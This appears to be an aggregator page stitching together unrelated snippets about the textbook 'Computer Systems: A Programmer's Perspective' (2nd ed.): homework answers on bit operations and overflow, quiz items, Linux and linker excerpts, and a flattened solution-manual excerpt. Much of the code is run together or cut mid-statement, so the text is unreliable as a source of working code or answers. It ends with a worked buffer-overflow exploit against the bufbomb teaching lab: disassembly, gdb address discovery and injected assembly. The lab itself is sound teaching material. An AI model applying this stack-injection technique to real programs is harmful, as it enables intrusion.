深入理解计算机系统(第二版) 家庭作业第七章

合集下载

深入理解计算机系统(第二版) 家庭作业答案

int int_shifts_are_arithmetic(){int x = -1;return (x>>1) == -1;}2.63对于sra，主要的工作是将xrsl的第w-k-1位扩展到前面的高位。

这个可以利用取反加1来实现，不过这里的加1是加1<<(w-k-1)。

如果x的第w-k-1位为0，取反加1后，前面位全为0，如果为1，取反加1后就全是1。

最后再使用相应的掩码得到结果。

对于srl，注意工作就是将前面的高位清0，即xsra & (1<<(w-k) - 1)。

额外注意k==0时，不能使用1<<(w-k)，于是改用2<<(w-k-1)。

int sra(int x, int k){int xsrl = (unsigned) x >> k;int w = sizeof(int) << 3;unsigned z = 1 << (w-k-1);unsigned mask = z - 1;unsigned right = mask & xsrl;unsigned left = ~mask & (~(z&xsrl) + z);return left | right;}int srl(unsigned x, int k){int xsra = (int) x >> k;int w = sizeof(int)*8;unsigned z = 2 << (w-k-1);return (z - 1) & xsra;}INT_MIN);}2.74对于有符号整数相减，溢出的规则可以总结为：t = a-b;如果a, b 同号，则肯定不会溢出。

如果a>=0 && b<0，则只有当t<=0时才算溢出。

如果a<0 && b>=0，则只有当t>=0时才算溢出。

深入理解计算机系统配套练习卷

深入理解计算机系统配套练习卷Chapter 11.1.0 字母a的ASCII码为97，那么love中各字母ASCII码之和是（）A、99B、520C、438D、3601.2.0_1 在编译过程中，hell.c经过汇编阶段后生成文件为（）A、hell.iB、hell.sC、hell.oD、hell.exe1.2.0_2 在编译过程中，hell.c经过（）阶段生成hell.s。

A、预处理B、编译C、汇编D、链接1.4.1 下面哪一项不是I/O设备A、鼠标B、显示器C、键盘D、《深入理解计算机系统》1.4.2 数据可以不通过处理器直接从磁盘到达主存吗？DMA又是什么？A、可以；直接存储器存取B、可以；动态存储器存取C、不可以；直接存储器存取D、不可以；动态存储器存取Chapter 22.1.1_1 二进制串11010110对应的十六进制数是（）A、0xx0B、0xD6C、0XC6D、0Xd52.1.1_2 十六进制数0x77对应的十进制数为（）A、77B、117C、109D、1192.1.3 对于32位机器，char * 的字节数为（）A、1B、2C、4D、82.1.4_1 使用小端法的机器，数字0x123678的高位字节是（）A、0x12B、0x21C、0x78D、0x872.1.4_2 从使用小端法的机器读入数字0x1234，存入使用大端法的机器，这时高位字节是（）A、0x12B、0x21C、0x34D、0x432.1.8 char a=0xdb, 则~a 的值为（）A、0xdbB、0xbdC、0x24D、0x422.1.8 int a=1, b=2, 经运算a^=b^=a^=b 后结果为（）A、a=3, b=2B、a=1, b=2C、a=2, b=1D、不知道2.1.10 int a = 3, 则a<<3 的结果为（）A、3B、24C、12D、482.2.1 unsigned char 的最小值为（）A、128B、255C、-127D、02.2.3 对长度为4位的整数数据，-5对应的补码编码为（）A、1011B、1101C、0101D、10102.3.2 对长度为4的整数数据，x=[1010], y=[1100]，x+y补码加法的结果为（）A、1010B、0110C、1100D、10110Chapter 33.2.2 命令unix> gcc -O1 -C code.c 所生成文件相当于经编译过程中（）阶段后的结果。

深入理解计算机系统配套练习卷终审稿)

深入理解计算机系统配套练习卷文稿归稿存档编号：[KKUY-KKIO69-OTM243-OLUI129-G00I-FDQS58-《深入》题目李永伟第一章题目我们通常所说的“字节”由_____个二进制位构成。

A 2B 4C 6D 8微型计算机硬件系统中最核心的部位是__。

A 主板B. CPUC 内存处理器D I/O设备CPU中有一个程序计数器（又称指令计数器）。

它用于存储__。

A．保存将要提取的下一条指令的地址B．保存当前CPU所要访问的内存单元地址C．暂时存放ALU运算结果的信息D．保存当前正在执行的一条指令下列叙述中，正确的是A．CPU能直接读取硬盘上的数据B．CPU能直接存取内存储器C．CPU由存储器、运算器和控制器组成D．CPU主要用来存储程序和数据“32位微型计算机”中的32指的是（）。

A.微机型号B.内存容量C.运算速度D.机器字长第二章题目求下列算是得值，结果用十六进制表示：0x503c + 64 =______A． 0x507cB．0x507bC． 0x506cD．0x506b将十进制数167用十六进制表示的结果是______A．0XB7B．0XA7C．0XB6D．0XA6位级运算：0x69 & 0x55 的结果是_______A．0X40B．0X41C．0X42D．0X43逻辑运算！！0x41的结果用十六进制表示为_____A．0X00B．0X41C．0X14D．0X01位移运算：对参数则x>>4(算术右移)的结果是______A．[01010000]B．[00001001]C．D．截断：假设一个4位数值（用十六进制数字0~F表示）截断到一个3位数值（用十六进制0~7表示），[1011]截断后的补码值是___A．-3B．3C．5D．-5浮点表示：数字5用浮点表示时的小数字段frac的解释为描述小数值f，则f=______A.1/2B.1/4C.1/8D.1/162.4.2 _25-8数字5用浮点表示，则指数部分E=_____A.1B.2C.3D.4数字5用浮点表示，则指数部分位表示为___A ．2^ (K-1)+1B. 2^K+1C. 2^ (K-1)D. 2^K浮点运算：（3.14+1e10）-1e10 在计算机中的运算结果为A ．3.14B ．0C ．1e10D ．0.0第三章题目计算Imm(E b ,E i ,s)这种寻址模式所表示的有效地址：A ．Imm + R[E b ]+R[E s ] *sB. Imm + R[E b ]+R[Es]C. Imm + R[E b ]D. Imm +R[E s ]下面这种寻址方式属于_____M[R[E b ]]A. 立即数寻址B. 寄存器寻址C. 绝对寻址D. 间接寻址假设初始值：%dh=CD，则执行下面一条指令后，%eax的值为多少？MOVB %DH ，%ALA． %eax= 987654CDB． %eax= CD765432C %eax= FFFFFFCDD． %eax= 000000CD假设初始值：%dh=CD，则执行下面一条指令后，%eax的值为多少？MOVSBL %DH ，%ALA． %eax= 987654CDB． %eax= CD765432C %eax= FFFFFFCDD． %eax= 000000CD假设初始值：%dh=CD，则执行下面一条指令后，%eax的值为多少？MOVZBL %DH ，%ALA． %eax= 987654CDB． %eax= CD765432C %eax= FFFFFFCDD． %eax= 000000CD假设寄存器%eax的值为x，%ecx的值为y，则指明下面汇编指令存储在寄存器%edx中的值Leal （%eax ，%ecx），%edxA． xB yC x + yD x –y假设寄存器%eax的值为x，%ecx的值为y，则指明下面汇编指令存储在寄存器%edx中的值Leal 9（%eax ，%ecx , 2），%edxA． x +y +2B 9*(x + y + 2)C 9 + x + y +2D 9 + x + 2y条件码CF表示______A 零标志B 符号标志C 溢出标志D进位标志条件码OF表示______A 零标志B 符号标志C 溢出标志D进位标志在奔腾4上运行，当分支行为模式非常容易预测时，我们的代码需要大约16个时钟周期，而当模式是随机时，大约需要31个时钟周期，则预测错误处罚大约是多少？A． 25B． 30C． 35D． 40第五章题目指针xp指向x，指针yp指向y，下面是一个交换两个值得过程：Viod swap (int *xp ,int *yp){*xp = *xp + *yp //x+y*yp = *xp - *yp //x+y-y=x*xp = *xp - *yp //x+y-x=y}考虑，当xp=yp时，xp处的值是多少A . xB. yC . 0D．不确定考虑下面函数：int min( int x , int y ) { return x < y x : y;}int max( int x , int y ){ return x < y y : x; }viod incr (int *xp ,int v) { *xp += v;}int square( int x ) { return x *x; }下面一个片段调用这些函数：for( i = min(x,y) ;i< max(x,y); incr(&i，1))t +=square(i) ;假设x等于10，y等于100.指出该片段中4个函数 min (),max(),incr(),square()每个被调用的次数一次为A．91 1 90 90B．1 91 90 90C．1 1 90 90D．90 1 90 90考虑下面函数：int min( int x , int y ) { return x < y x : y;}int max( int x , int y ){ return x < y y : x; }viod incr (int *xp ,int v) { *xp += v;}int square( int x ) { return x *x; }下面一个片段调用这些函数：for( i = max(x,y) -1;i >= min(x,y); incr(&i，-1))t +=square(i) ;假设x等于10，y等于100.指出该片段中4个函数 min (),max(),incr(),square()每个被调用的次数一次为A．91 1 90 90B．1 91 90 90C．1 1 90 90D．90 1 90 90考虑下面函数：int min( int x , int y ) { return x < y x : y;}int max( int x , int y ){ return x < y y : x; }viod incr (int *xp ,int v) { *xp += v;}int square( int x ) { return x *x; }下面一个片段调用这些函数：Int low = min(x,y);Int high = max(x,y);For(i= low;i<high;incr(&i,1)t +=square(i);假设x等于10，y等于100.指出该片段中4个函数 min (),max(),incr(),square()每个被调用的次数依次为A．91 1 90 90B．1 91 90 90C．1 1 90 90D．90 1 90 90假设某个函数有多个变种，这些变种保持函数的行为，又具有不同的性能特性，对于其中的三个变种，我们发现运行时间（以时钟周期为单位）可以用下面的函数近似的估计版本1：60+35n版本2：136+4n版本3：157+1.25n问题是当n=2时，哪个版本最快？A．1B．2C．3D．无法比较假设某个函数有多个变种，这些变种保持函数的行为，又具有不同的性能特性，对于其中的三个变种，我们发现运行时间（以时钟周期为单位）可以用下面的函数近似的估计版本1：60+35n版本2：136+4n版本3：157+1.25n问题是当n=5时，哪个版本最快？A．1B．2C．3D．无法比较假设某个函数有多个变种，这些变种保持函数的行为，又具有不同的性能特性，对于其中的三个变种，我们发现运行时间（以时钟周期为单位）可以用下面的函数近似的估计版本1：60+35n版本2：136+4n版本3：157+1.25n问题是当n=10时，哪个版本最快？A．1B．2C．3D．无法比较下面有一个函数：double poly( double a[] ,double x, int degree){long int i；double result = a[0]；double xpwr =x;for(i=1 ; i<=degree; i++){result += a[i] *xpwr;xpwr =x *xpwr;}return result;}当degree=n，这段代码共执行多少次加法和多少次乘法？A．n nB．2n nC．n 2nD．2n 2n一名司机运送一车货物从A地到B地，总距离为2500公里。

计算机操作系统教程(第二版)(章 (7)

第7章 Linux操作系统简介
伯克利(Berkeley)的加州大学是学术用户中的一个。在这里，UNIX得到了计算机系统研究小组(CSRG)的广泛使用，并且对它进行了修改，从而产生了UNIX的一大系列——伯克利软件开发(BSD)UNIX。除了AT&T所提供的UNIX系列之外， BSD是最有影响力的UNIX系列。 BSD在UNIX中增加了很多显著特性，例如TCP/IP网络，更好的用户文件系统(UFS)等，并且改进了AT&T的内存管理代码。在用户需求和用户编程的促进下，BSD风格的UNIX一般要比AT&T的UNIX更具有创新性，而且改进也更为迅速。
第7章 Linux操作系统简介
(4) 健壮性和安全性(Robustness and Security)。Linux必须健壮、稳定，系统自身应该没有任何缺陷，并且它还应该可以保护进程(用户)，以防止互相干扰。保证Linux健壮性和安全性的一个重要的因素是其开放的开发过程，它可以被看作是一种广泛而严格的检查。内核中的每一行代码、每一个改变都会很快由世界上数不清的程序员检验。还有一些程序员专门负责寻找和报告潜在的缺陷。以前检查中所没有发现的缺陷可以通过这些人的努力来定位、修复，而这种修复又合并进主开发树，以使所有的人都能够受益。
放的，是符合标准规范的32位（在64位CPU上是64位）操作系统。Linux拥有现代操作系统所具有的功能，例如：真正的抢先式多任务处理；支持多用户；提供内存保护机制；支持虚拟内存；支持对称多处理SMP（Symmetric Multiprocessing）；符合POSIX标准；提供联网功能以及大量的网络应用；是图形用户接口和桌面环境（实际上桌面环境并不只一个）；保证速度和稳定性要求等。

深入理解计算机系统第七章

How Linkers Use Static Libraries to Resolve References
For each input file f on the command line, the linker determines if f is an object file or an archive.If f is an object file, the linker adds f to E, updates U and D to reflect the symbol definitions and references in f, and proceeds to the next input file. If f is an archive, the linker attempts to match the unresolved symbols in U against the symbols defined by the members of the archive. If some archive member, m, defines a symbol that resolves a reference in U, then mis added to E, and the linker updates U and D to reflect the symbol definitions and references inm. This process iterates over the member object files in the archive until a fixed point is reached where U and D no longer change. At this point, any member object files not contained in E are simply discarded and the linker proceeds to the next input file. If U is nonempty when the linker finishes scanning the input files on the command line, it prints an error and terminates. Otherwise it merges and relocates the object files in E to build the output executable file

深入理解计算机系统(第二版)家庭作业问题详解

int saturating_add(int x, int y){int w = sizeof(int)<<3;int t = x + y;int ans = x + y;x>>=(w-1);y>>=(w-1);t>>=(w-1);int pos_ovf = ~x&~y&t;int neg_ovf = x&y&~t;int novf = ~(pos_ovf|neg_ovf);return(pos_ovf & INT_MAX) | (novf & ans) | (neg_ovf & INT_MIN); }2.74对于有符号整数相减，溢出的规则可以总结为：t = a-b;如果a, b 同号，则肯定不会溢出。

如果a>=0 && b<0，则只有当t<=0时才算溢出。

如果a<0 && b>=0，则只有当t>=0时才算溢出。

不过，上述t肯定不会等于0，因为当a，b不同号时：1) a!=b，因此a-b不会等于0。

2) a-b <= abs(a) + abs(b) <= abs(TMax) + abs(TMin)=(2^w - 1)所以，a，b异号，t，b同号即可判定为溢出。

int tsub_ovf(int x, int y){int w = sizeof(int)<<3;int t = x - y;x>>=(w-1);y>>=(w-1);t>>=(w-1);return(x != y) && (y == t);}顺便整理一下汇编中CF，OF的设定规则(个人总结，如有不对之处，欢迎指正)。

t = a + b;CF: (unsigned t) < (unsigned a) 进位标志OF: (a<0 == b<0) && (t<0 != a<0)t = a - b;CF: (a<0 && b>=0) || ((a<0 == b<0) && t<0) 退位标志OF: (a<0 != b<0) && (b<0 == t<0)汇编中，无符号和有符号运算对条件码（标志位）的设定应该是相同的，但是对于无符号比较和有符号比较，其返回值是根据不同的标志位进行的。

深入理解计算机系统第二版习题答案

Computer Systems: A Programmer’s Perspective Instructor’s Solution Manual 1
Randal E. Bryant David R. O’Hallaron
December 4, 2003
1Copyright c 2003, R. E. Bryant, D. R. O’Hallaron. All rights reserved.
4}
5
6 void show_long(long int x)
7{
8
show_bytes((byte_pointer) &x, sizeof(long));
9}
code/data/show-ans.c
1
2
CHAPTER 1. SOLUTIONS TO HOMEWORK PROBLEMS
10
11 void show_double(double x)
12 {
13
show_bytes((byte_pointer) &x, sizeof(double));
14 }
code/data/show-ans.c
Problem 2.41 Solution: There are many ways to solve this problem. The basic idea is to create some multibyte datum with different values for the most and least-signiﬁcant bytes. We then read byte 0 and determine which byte it is. In the following solution is to create an int with value 1. We then access its ﬁrst byte and convert it to an int. This byte will equal 0 on a big-endian machine and 1 on a little-endian machine.

深入理解计算机系统第2版课程设计

深入理解计算机系统第2版课程设计选题背景计算机科学教育中，操作系统是重要的课程之一。

其中经典教材《深入理解计算机系统》第2版（英文名：Computer Systems: A Programmer’s Perspective, 2nd Edition）提供了系统性的学习框架，涵盖了计算机系统所有的关键概念，从硬件到操作系统到应用程序。

其通过清晰易懂的语言，详细深入的解释和广泛的范例来讲解分类程序开发，内存管理，虚拟存储，网络通信，操作系统和处理器等内容，使得学生能够全面理解计算机的性能和设计。

为了进一步加强学生的理论知识和实际操作能力，我们针对《深入理解计算机系统》第2版编写本课程设计，旨在让学生通过设计实际的系统模块来深入理解计算机系统，提高其操作系统和编程方面的技能。

课程设计目标•深入理解计算机系统的关键概念，包括进程管理、内存管理、文件系统、网络通信和处理器等。

•学习使用C语言进行系统级编程的方法，理解底层代码的编写方式。

•提高学生针对实际问题设计和开发系统程序的能力。

设计内容设计1：虚拟内存管理系统•理解虚拟内存的概念和实现机制。

•学习实现虚拟内存管理系统的方法，包括页面置换算法、页面故障处理和虚拟地址映射等。

•设计一个简单的虚拟内存管理系统，并实现其代码。

设计2：多进程文件共享•理解多进程文件共享的概念和实现机制。

•学习使用fork系统调用创建子进程的方法，以及同时读取和写入文件的方法。

•设计一个简单的多进程文件共享系统，并实现其代码。

设计3：处理器调度程序•理解处理器调度程序的概念和实现机制。

•学习实现处理器调度程序的方法，包括进程状态的转换、进程优先级算法和时间片轮转算法等。

•设计一个简单的处理器调度程序，并实现其代码。

设计要求•设计要求每个设计至少有算法模块、代码实现，且需使用C语言完成。

•为了检验设计结果的正确性，每个设计需提供自行设计的测试用例。

•课程结束时需收集所有设计的源代码和报告文档。

《深入理解计算机系统》阅读总结与摘要

《深⼊理解计算机系统》阅读总结与摘要前⾔《深⼊理解计算机系统》值得每位程序员⼀读，看完之后将会对整个计算机体系有⼀个直观的认识。

第⼀章计算机系统漫游只有ascii字符构成的⽂件称为⽂本⽂件，所有其它⽂件都称为⼆进制⽂件。

c语⾔是古怪的，有缺陷的，但同时也是⼀个巨⼤的成功，为什么会成功呢c语⾔与unix操作系统关系密切c语⾔⼩⽽简单c语⾔是为实践⽬的设计的有⼀些重要的原因促使程序员必须知道编译系统是如何⼯作的优化程序性能理解链接时出现的错误避免安全漏洞shell是⼀个命令⾏解释器，它提出⼀个提⽰符，等待输⼊⼀个命令⾏，然后执⾏这个命令。

如果该命令⾏的第⼀个单词不是⼀个内置的shell命令，那么shell就会假设这是⼀个可执⾏⽂件的名字，它将加载并运⾏这个⽂件。

贯穿整个系统的是⼀组电⼦管道，称作总线。

io设备是系统与外部世界的联系通道。

主存是⼀个临时存储设备，在处理器执⾏程序时，⽤来存放程序和程序处理的数据。

处理器，是解释或执⾏存储在主存中指令的引擎。

利⽤直接存储器存取，数据可以不通过处理器⽽直接从磁盘到达主存。

通过让⾼速缓存⾥存放可能经常访问的数据，⼤部分的内存操作都能在快速地⾼速缓存中完成每个计算机系统中的存储设备都被组织成了⼀个存储器层次结构。

操作系统有两个基本功能防⽌硬件被失控的应⽤程序滥⽤，向应⽤程序提供简单⼀致的机制来控制复杂⽽⼜通常⼤不相同的低级硬件设备。

操作系统通过基本的抽象概念(进程，虚拟内存和⽂件)来实现这两个功能。

⽂件是对i/o设备的抽象表⽰，虚拟内存是对主存和磁盘i/o设备的抽象表⽰，进程则是对处理器，主存和i/o设备的抽象表⽰。

进程是对操作系统对⼀个正在运⾏的程序的⼀种抽象。

进程并发运⾏，则是说⼀个进程的指令和另⼀个进程的指令是交错执⾏的。

操作系统实现这种交错执⾏的机制称为上下⽂切换。

操作系统保持跟踪进程运⾏所需的所有状态信息。

这种状态，也就是上下⽂。

当操作系统决定要把控制权从当前进程转移到某个新进程时，就会进⾏上下⽂切换，即保存当前进程的上下⽂，恢复新进程的上下⽂，然后将控制权传递到新进程。

第七章习题答案

第 7 章习题答案（第二版书）2（4），2（5），2（9），2（10）-- (省略) 6， 17，23，24（其中表中数据都是16进制）6. 某计算机中已配有0000H ～7FFFH 的ROM 区域，现在再用8K×4位的RAM 芯片形成32K×8位的存储区域，CPU 地址总线为A0-A15，数据总线为D0-D7，控制信号为R/W#（读/写）、MREQ#（访存）。

要求说明地址译码方案，并画出ROM 芯片、RAM 芯片与CPU 之间的连接图。

假定上述其他条件不变，只是CPU 地址线改为24根，地址范围000000H ～007FFFH 为ROM 区，剩下的所有地址空间都用8K×4位的RAM 芯片配置，则需要多少个这样的RAM 芯片？参考答案：CPU 地址线共16位，故存储器地址空间为0000H ～FFFFH ，其中，8000H ～FFFFH 为RAM 区，共215=32K 个单元，其空间大小为32KB ，故需8K×4位的芯片数为32KB/8K×4位= 4×2 = 8片。

因为ROM 区在0000H ～7FFFH ，RAM 区在8000H ～FFFFH ，所以可通过最高位地址A 15来区分，当A 15为0时选中ROM 芯片；为1时选中RAM 芯片，此时，根据A 14和A 13进行译码，得到4个译码信号，分别用于4组字扩展芯片的片选信号。

（图略，可参照图4.15）若CPU 地址线为24位，ROM 区为000000H ～007FFFH ，则ROM 区大小为32KB ，总大小为16MB=214KB=512×32KB ，所以RAM 区大小为511×32KB ，共需使用RAM 芯片数为511×32KB/8K×4位=511×4×2个芯片。

17. 假设某计算机的主存地址空间大小为64MB ，采用字节编址方式。

深入理解计算机系统家庭作业答案

2) a-b <= abs(a) + abs(b) <= abs(TMax) + abs(TMin)=(2^w - 1)所以，a，b异号，t，b同号即可判定为溢出。

详情可以参考第三章节。

根据2-18，不难推导， (x'*y')_h = (x*y)_h + x(w-1)*y + y(w-1)*x。

unsigned unsigned_high_prod(unsigned x, unsigned y){int w = sizeof(int)<<3;A. false，float只能精确表示最高位1和最低位的1的位数之差小于24的整数。

所以当x==TMAX时，用float就无法精确表示，但double是可以精确表示所有32位整数的。

深入理解计算机系统答案(超高清电子版)

Computer Systems:A Programmer’s PerspectiveInstructor’s Solution Manual1Randal E.BryantDavid R.O’HallaronDecember4,20031Copyright c2003,R.E.Bryant,D.R.O’Hallaron.All rights reserved.2Chapter1Solutions to Homework ProblemsThe text uses two different kinds of exercises:Practice Problems.These are problems that are incorporated directly into the text,with explanatory solutions at the end of each chapter.Our intention is that students will work on these problems as they read the book.Each one highlights some particular concept.Homework Problems.These are found at the end of each chapter.They vary in complexity from simple drills to multi-week labs and are designed for instructors to give as assignments or to use as recitation examples.This document gives the solutions to the homework problems.1.1Chapter1:A Tour of Computer Systems1.2Chapter2:Representing and Manipulating InformationProblem2.40Solution:This exercise should be a straightforward variation on the existing code.2CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS1011void show_double(double x)12{13show_bytes((byte_pointer)&x,sizeof(double));14}code/data/show-ans.c 1int is_little_endian(void)2{3/*MSB=0,LSB=1*/4int x=1;56/*Return MSB when big-endian,LSB when little-endian*/7return(int)(*(char*)&x);8}1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION3 There are many solutions to this problem,but it is a little bit tricky to write one that works for any word size.Here is our solution:code/data/shift-ans.c The above code peforms a right shift of a word in which all bits are set to1.If the shift is arithmetic,the resulting word will still have all bits set to1.Problem2.45Solution:This problem illustrates some of the challenges of writing portable code.The fact that1<<32yields0on some32-bit machines and1on others is common source of bugs.A.The C standard does not deﬁne the effect of a shift by32of a32-bit datum.On the SPARC(andmany other machines),the expression x<<k shifts by,i.e.,it ignores all but the least signiﬁcant5bits of the shift amount.Thus,the expression1<<32yields1.pute beyond_msb as2<<31.C.We cannot shift by more than15bits at a time,but we can compose multiple shifts to get thedesired effect.Thus,we can compute set_msb as2<<15<<15,and beyond_msb as set_msb<<1.Problem2.46Solution:This problem highlights the difference between zero extension and sign extension.It also provides an excuse to show an interesting trick that compilers often use to use shifting to perform masking and sign extension.A.The function does not perform any sign extension.For example,if we attempt to extract byte0fromword0xFF,we will get255,rather than.B.The following code uses a well-known trick for using shifts to isolate a particular range of bits and toperform sign extension at the same time.First,we perform a left shift so that the most signiﬁcant bit of the desired byte is at bit position31.Then we right shift by24,moving the byte into the proper position and peforming sign extension at the same time.4CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 3int left=word<<((3-bytenum)<<3);4return left>>24;5}Problem2.48Solution:This problem lets students rework the proof that complement plus increment performs negation.We make use of the property that two’s complement addition is associative,commutative,and has additive ing C notation,if we deﬁne y to be x-1,then we have˜y+1equal to-y,and hence˜y equals -y+1.Substituting gives the expression-(x-1)+1,which equals-x.Problem2.49Solution:This problem requires a fairly deep understanding of two’s complement arithmetic.Some machines only provide one form of multiplication,and hence the trick shown in the code here is actually required to perform that actual form.As seen in Equation2.16we have.Theﬁnal term has no effect on the-bit representation of,but the middle term represents a correction factor that must be added to the high order bits.This is implemented as follows:code/data/uhp-ans.c Problem2.50Solution:Patterns of the kind shown here frequently appear in compiled code.1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION5A.:x+(x<<2)B.:x+(x<<3)C.:(x<<4)-(x<<1)D.:(x<<3)-(x<<6)Problem2.51Solution:Bit patterns similar to these arise in many applications.Many programmers provide them directly in hex-adecimal,but it would be better if they could express them in more abstract ways.A..˜((1<<k)-1)B..((1<<k)-1)<<jProblem2.52Solution:Byte extraction and insertion code is useful in many contexts.Being able to write this sort of code is an important skill to foster.code/data/rbyte-ans.c Problem2.53Solution:These problems are fairly tricky.They require generating masks based on the shift amounts.Shift value k equal to0must be handled as a special case,since otherwise we would be generating the mask by performing a left shift by32.6CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1unsigned srl(unsigned x,int k)2{3/*Perform shift arithmetically*/4unsigned xsra=(int)x>>k;5/*Make mask of low order32-k bits*/6unsigned mask=k?((1<<(32-k))-1):˜0;78return xsra&mask;9}code/data/rshift-ans.c 1int sra(int x,int k)2{3/*Perform shift logically*/4int xsrl=(unsigned)x>>k;5/*Make mask of high order k bits*/6unsigned mask=k?˜((1<<(32-k))-1):0;78return(x<0)?mask|xsrl:xsrl;9}.1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION7B.(a)For,we have,,code/data/ﬂoatge-ans.c 1int float_ge(float x,float y)2{3unsigned ux=f2u(x);4unsigned uy=f2u(y);5unsigned sx=ux>>31;6unsigned sy=uy>>31;78return9(ux<<1==0&&uy<<1==0)||/*Both are zero*/10(!sx&&sy)||/*x>=0,y<0*/11(!sx&&!sy&&ux>=uy)||/*x>=0,y>=0*/12(sx&&sy&&ux<=uy);/*x<0,y<0*/13},8CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS This exercise is of practical value,since Intel-compatible processors perform all of their arithmetic in ex-tended precision.It is interesting to see how adding a few more bits to the exponent greatly increases the range of values that can be represented.Description Extended precisionValueSmallest denorm.Largest norm.Problem2.59Solution:We have found that working throughﬂoating point representations for small word sizes is very instructive. Problems such as this one help make the description of IEEEﬂoating point more concrete.Description8000Smallest value4700Largest denormalized———code/data/fpwr2-ans.c1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS91/*Compute2**x*/2float fpwr2(int x){34unsigned exp,sig;5unsigned u;67if(x<-149){8/*Too small.Return0.0*/9exp=0;10sig=0;11}else if(x<-126){12/*Denormalized result*/13exp=0;14sig=1<<(x+149);15}else if(x<128){16/*Normalized result.*/17exp=x+127;18sig=0;19}else{20/*Too big.Return+oo*/21exp=255;22sig=0;23}24u=exp<<23|sig;25return u2f(u);26}10CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS int decode2(int x,int y,int z){int t1=y-z;int t2=x*t1;int t3=(t1<<31)>>31;int t4=t3ˆt2;return t4;}Problem3.32Solution:This code example demonstrates one of the pedagogical challenges of using a compiler to generate assembly code examples.Seemingly insigniﬁcant changes in the C code can yield very different results.Of course, students will have to contend with this property as work with machine-generated assembly code anyhow. They will need to be able to decipher many different code patterns.This problem encourages them to think in abstract terms about one such pattern.The following is an annotated version of the assembly code:1movl8(%ebp),%edx x2movl12(%ebp),%ecx y3movl%edx,%eax4subl%ecx,%eax result=x-y5cmpl%ecx,%edx Compare x:y6jge.L3if>=goto done:7movl%ecx,%eax8subl%edx,%eax result=y-x9.L3:done:A.When,it will computeﬁrst and then.When it just computes.B.The code for then-statement gets executed unconditionally.It then jumps over the code for else-statement if the test is false.C.then-statementt=test-expr;if(t)goto done;else-statementdone:D.The code in then-statement must not have any side effects,other than to set variables that are also setin else-statement.1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS11Problem3.33Solution:This problem requires students to reason about the code fragments that implement the different branches of a switch statement.For this code,it also requires understanding different forms of pointer dereferencing.A.In line29,register%edx is copied to register%eax as the return value.From this,we can infer that%edx holds result.B.The original C code for the function is as follows:1/*Enumerated type creates set of constants numbered0and upward*/2typedef enum{MODE_A,MODE_B,MODE_C,MODE_D,MODE_E}mode_t;34int switch3(int*p1,int*p2,mode_t action)5{6int result=0;7switch(action){8case MODE_A:9result=*p1;10*p1=*p2;11break;12case MODE_B:13*p2+=*p1;14result=*p2;15break;16case MODE_C:17*p2=15;18result=*p1;19break;20case MODE_D:21*p2=*p1;22/*Fall Through*/23case MODE_E:24result=17;25break;26default:27result=-1;28}29return result;30}Problem3.34Solution:This problem gives students practice analyzing disassembled code.The switch statement contains all the features one can imagine—cases with multiple labels,holes in the range of possible case values,and cases that fall through.12CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1int switch_prob(int x)2{3int result=x;45switch(x){6case50:7case52:8result<<=2;9break;10case53:11result>>=2;12break;13case54:14result*=3;15/*Fall through*/16case55:17result*=result;18/*Fall through*/19default:20result+=10;21}2223return result;24}code/asm/varprod-ans.c 1int var_prod_ele_opt(var_matrix A,var_matrix B,int i,int k,int n) 2{3int*Aptr=&A[i*n];4int*Bptr=&B[k];5int result=0;6int cnt=n;78if(n<=0)9return result;1011do{12result+=(*Aptr)*(*Bptr);13Aptr+=1;14Bptr+=n;15cnt--;1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS13 16}while(cnt);1718return result;19}code/asm/structprob-ans.c 1typedef struct{2int idx;3int x[4];4}a_struct;14CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1/*Read input line and write it back*/2/*Code will work for any buffer size.Bigger is more time-efficient*/ 3#define BUFSIZE644void good_echo()5{6char buf[BUFSIZE];7int i;8while(1){9if(!fgets(buf,BUFSIZE,stdin))10return;/*End of file or error*/11/*Print characters in buffer*/12for(i=0;buf[i]&&buf[i]!=’\n’;i++)13if(putchar(buf[i])==EOF)14return;/*Error*/15if(buf[i]==’\n’){16/*Reached terminating newline*/17putchar(’\n’);18return;19}20}21}An alternative implementation is to use getchar to read the characters one at a time.Problem3.38Solution:Successfully mounting a buffer overﬂow attack requires understanding many aspects of machine-level pro-grams.It is quite intriguing that by supplying a string to one function,we can alter the behavior of another function that should always return aﬁxed value.In assigning this problem,you should also give students a stern lecture about ethical computing practices and dispell any notion that hacking into systems is a desirable or even acceptable thing to do.Our solution starts by disassembling bufbomb,giving the following code for getbuf: 1080484f4<getbuf>:280484f4:55push%ebp380484f5:89e5mov%esp,%ebp480484f7:83ec18sub$0x18,%esp580484fa:83c4f4add$0xfffffff4,%esp680484fd:8d45f4lea0xfffffff4(%ebp),%eax78048500:50push%eax88048501:e86a ff ff ff call8048470<getxs>98048506:b801000000mov$0x1,%eax10804850b:89ec mov%ebp,%esp11804850d:5d pop%ebp12804850e:c3ret13804850f:90nopWe can see on line6that the address of buf is12bytes below the saved value of%ebp,which is4bytes below the return address.Our strategy then is to push a string that contains12bytes of code,the saved value1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS15 of%ebp,and the address of the start of the buffer.To determine the relevant values,we run GDB as follows:1.First,we set a breakpoint in getbuf and run the program to that point:(gdb)break getbuf(gdb)runComparing the stopping point to the disassembly,we see that it has already set up the stack frame.2.We get the value of buf by computing a value relative to%ebp:(gdb)print/x(%ebp+12)This gives0xbfffefbc.3.Weﬁnd the saved value of register%ebp by dereferencing the current value of this register:(gdb)print/x*$ebpThis gives0xbfffefe8.4.Weﬁnd the value of the return pointer on the stack,at offset4relative to%ebp:(gdb)print/x*((int*)$ebp+1)This gives0x8048528We can now put this information together to generate assembly code for our attack:1pushl$0x8048528Put correct return pointer back on stack2movl$0xdeadbeef,%eax Alter return value3ret Re-execute return4.align4Round up to125.long0xbfffefe8Saved value of%ebp6.long0xbfffefbc Location of 